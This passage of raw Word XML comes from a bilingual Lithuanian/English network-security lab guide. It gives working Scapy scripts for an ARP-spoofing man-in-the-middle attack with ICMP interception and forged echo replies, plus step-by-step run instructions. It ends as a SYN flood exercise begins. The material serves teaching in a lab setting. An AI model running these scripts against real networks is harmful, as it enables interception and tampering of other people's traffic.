      <w:r w:rsidRPr="00352171">
        <w:t>victim_ip = "10.0.2.5"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249FEB39" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="260FC246" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>def icmp_sniff(packet):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459CC5BB" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">       if packet.haslayer(ICMP) and packet[IP].src == victim_ip:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5A69A8" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">          print(f"ICMP packet intercepted: {packet.summary()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699419E3" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">          if packet[ICMP].type == 8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B1FAB8" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">             print(f"Echo request from {victim_ip}. Modifying packet...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EC5C34" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">             reply = IP(dst=packet[IP].src, src=packet[IP].dst) / ICMP(type=0) / packet[Raw].load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9A1E5E" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">             send(reply)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8BD012" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">             print(f"Sent forged reply: {reply.summary()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABA06CC" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">          else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA3AC27" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">             send(packet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B105187" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>print(f"Starting ICMP packet interception...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA18C7B" w14:textId="0C14572D" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>sniff(filter="icmp", prn=icmp_sniff)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6567C16F" w14:textId="09917F47" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754D5E39" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="006A432C" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:r w:rsidRPr="006A432C">
        <w:lastRenderedPageBreak/>
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34249962" w14:textId="1DDAE4AA" w:rsidR="006A432C" w:rsidRPr="006A432C" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:r w:rsidRPr="006A432C">
        <w:t xml:space="preserve">Before starting, on the Kali system you need to run sysctl -w net.ipv4.ip_forward=1 so that we can forward packets. Then create two files  </w:t>
      </w:r>
      <w:r w:rsidRPr="006A432C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>touch ICMPMITM_1</w:t>
      </w:r>
      <w:r w:rsidRPr="006A432C">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="006A432C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>touch ICMPMITM_2</w:t>
      </w:r>
      <w:r w:rsidRPr="006A432C">
        <w:t>. To use these two scripts at the same time, we will need two Terminal windows on our Kali system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1D14FF" w14:textId="7183025B" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:r w:rsidRPr="006A432C">
        <w:t>Edit the first created file: nano ICMPMITM_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7E056B" w14:textId="1749CFBD" w:rsidR="006A432C" w:rsidRPr="006A432C" w:rsidRDefault="006A432C" w:rsidP="006A432C"/>
    <w:p w14:paraId="64909A70" w14:textId="253B5DC0" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A81A7F8" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B15A830" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E22424" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>victim_ip = "10.0.2.5"</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>victim_mac = "08:00:27:a9:b3:5b"</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>gateway_ip = "10.0.2.2"</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>gateway_mac = "08:00:27:62:31:48"</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>attacker_ip = "10.0.2.3"</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>attacker_mac = "08:00:27:1f:b7:23"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66911F5D" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="686D2C04" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F3E919C" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>ether_victim = Ether(dst=victim_mac)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E64E6AF" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>arp_victim = ARP(op=2, psrc=gateway_ip, hwsrc=attacker_mac,  pdst=victim_ip, hwdst=victim_mac)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF2BFAF" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>frame_victim = ether_victim/arp_victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB07CEE" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B5A6ED" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>ether_gateway = Ether(dst=gateway_mac)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD1C4A9" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>arp_gateway = ARP(op=2, psrc=victim_ip, hwsrc=attacker_mac, pdst=gateway_ip, hwdst=gateway_mac)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C727D2E" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>frame_gateway = ether_gateway/arp_gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F393C3B" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C"/>
    <w:p w14:paraId="41C87A33" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4304DD67" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> sendp(frame_victim)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAEA152" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> sendp(frame_gateway)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426F85A7" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> time.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B417ACC" w14:textId="05B35084" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:firstLine="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC5610B" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="006A432C" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:r w:rsidRPr="006A432C">
        <w:lastRenderedPageBreak/>
        <w:t>Next, edit the second file: nano ICMPMITM_2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C574D96" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C48464A" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBD53B4" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="594123E3" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>victim_ip = "10.0.2.5"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330AB347" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8C6F47" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>def icmp_sniff(packet):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7295D161" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">       if packet.haslayer(ICMP) and packet[IP].src == victim_ip:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788E673A" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">          print(f"ICMP packet intercepted: {packet.summary()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1B18FB" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">          if packet[ICMP].type == 8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9A00DE" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">             print(f"Echo request from {victim_ip}. Modifying packet...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B201A84" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">             reply = IP(dst=packet[IP].src, src=packet[IP].dst) / ICMP(type=0) / packet[Raw].load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A619F0" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">             send(reply)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643DD9D0" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">             print(f"Sent forged reply: {reply.summary()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D9E14C" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">          else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A4E731" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">             send(packet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794620AF" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>print(f"Starting ICMP packet interception...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1260CA45" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>sniff(filter="icmp", prn=icmp_sniff)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB554B6" w14:textId="2021622D" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770398E4" w14:textId="4BE3C10B" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBFA2BD" w14:textId="32276D74" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D9EC2EC" wp14:editId="793FDF88">
            <wp:extent cx="6645910" cy="1431290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6001276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7628" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1431290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="537969E0" w14:textId="6EF4BEAD" w:rsidR="00073435" w:rsidRPr="00352171" w:rsidRDefault="00073435" w:rsidP="006A432C">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E43EFFA" wp14:editId="22D3A81C">
            <wp:extent cx="6645910" cy="1301750"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="511390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0997" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1301750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6857EA20" w14:textId="77777777" w:rsidR="00073435" w:rsidRPr="00352171" w:rsidRDefault="00073435" w:rsidP="006A432C"/>
    <w:p w14:paraId="7DD92357" w14:textId="7EE1E261" w:rsidR="00073435" w:rsidRPr="00352171" w:rsidRDefault="00073435" w:rsidP="006A432C">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">LT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5B86CE" w14:textId="3553C8F5" w:rsidR="00073435" w:rsidRPr="00352171" w:rsidRDefault="00073435" w:rsidP="006A432C">
      <w:r w:rsidRPr="00352171">
        <w:t>Atsidarę du terminalus Kali sistemoje, vienoje iš jų įvedate “python ICMPMITM_1.py” ir palaukiate kelias sekundes. Tada kitame terminale įvygdote komandą “python ICMPMITM_2.py”. Norėdami pamatyti, jog ataka sėkminga, keliaujate į Ubuntu sistemą ir įvedate “ping 8.8.8.8” (Google serverį). Jeigu matote, tai ką aš jum pavaizdavau, reiškias viską atlikote teisingai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DF8C4F" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C"/>
    <w:p w14:paraId="4CB5E45A" w14:textId="7BE8BAC8" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="00073435" w:rsidP="006A432C">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50663373" w14:textId="391D66FC" w:rsidR="00073435" w:rsidRPr="00073435" w:rsidRDefault="00073435" w:rsidP="00073435">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00073435">
        <w:t xml:space="preserve">With two terminals open on the Kali system, in one of them enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00073435">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>python ICMPMITM_1.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00073435">
        <w:t xml:space="preserve"> and wait a few seconds. Then, in the other terminal, enter the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00073435">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>python ICMPMITM_2.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00073435">
        <w:t xml:space="preserve">. To check whether the attack was successful, go to the Ubuntu system and run </w:t>
      </w:r>
      <w:r w:rsidRPr="00073435">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ping 8.8.8.8</w:t>
      </w:r>
      <w:r w:rsidRPr="00073435">
        <w:t xml:space="preserve"> (Google's server). If you see what I showed you</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> in the picture</w:t>
      </w:r>
      <w:r w:rsidRPr="00073435">
        <w:t>, it means you did everything correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BBC92E" w14:textId="2DC26E6D" w:rsidR="00073435" w:rsidRPr="00352171" w:rsidRDefault="00073435" w:rsidP="006A432C"/>
    <w:p w14:paraId="17131016" w14:textId="77777777" w:rsidR="00073435" w:rsidRPr="00352171" w:rsidRDefault="00073435">
      <w:r w:rsidRPr="00352171">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="360D0D42" w14:textId="706D5680" w:rsidR="00073435" w:rsidRPr="00352171" w:rsidRDefault="00352171" w:rsidP="00352171">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t>Užduotis Nr. 12</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(Exercise 12)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6492EC1B" w14:textId="2B7BA363" w:rsidR="00352171" w:rsidRPr="00352171" w:rsidRDefault="00352171" w:rsidP="00352171">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>UDP ir TCP. TCP SYN apkrovos ataka</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(UDP and TCP. TCP SYN Flood attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C0BCF5" w14:textId="53F3700E" w:rsidR="00352171" w:rsidRPr="00352171" w:rsidRDefault="00352171" w:rsidP="00352171"/>
    <w:p w14:paraId="5E6B0C97" w14:textId="491BECF7" w:rsidR="00352171" w:rsidRPr="00352171" w:rsidRDefault="00352171" w:rsidP="00352171">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">LT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE828AB" w14:textId="2B7F1EBE" w:rsidR="00352171" w:rsidRDefault="00352171" w:rsidP="00352171">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">UDP ir TCP yra duomenų transportavimo protokolai. Pagal OSI modelį (tinklų standartą) </w:t>
      </w:r>
      <w:r>
        <w:t>jie yra laikomi 4 sluoksnyje.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E03E46B" w14:textId="77777777" w:rsidR="001B33B6" w:rsidRDefault="00352171" w:rsidP="00352171">
      <w:r>
        <w:t>TCP – patikimas ir saugus transportavimo protokolas</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">UDP – greitesnis, </w:t>
      </w:r>
      <w:r w:rsidR="001B33B6">
        <w:t>bet mažiau patikimas protokolas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C8A181" w14:textId="77777777" w:rsidR="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="00352171"/>
    <w:p w14:paraId="61377F1F" w14:textId="77777777" w:rsidR="001B33B6" w:rsidRPr="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001B33B6">
      <w:r w:rsidRPr="001B33B6">
        <w:t xml:space="preserve">EN: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2914AD0B" w14:textId="77777777" w:rsidR="001B33B6" w:rsidRPr="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001B33B6">
      <w:r w:rsidRPr="001B33B6">
        <w:t xml:space="preserve">UDP and TCP are data transport protocols. According to the OSI model (network standard), they are considered to operate at Layer 4. </w:t>
      </w:r>
    </w:p>
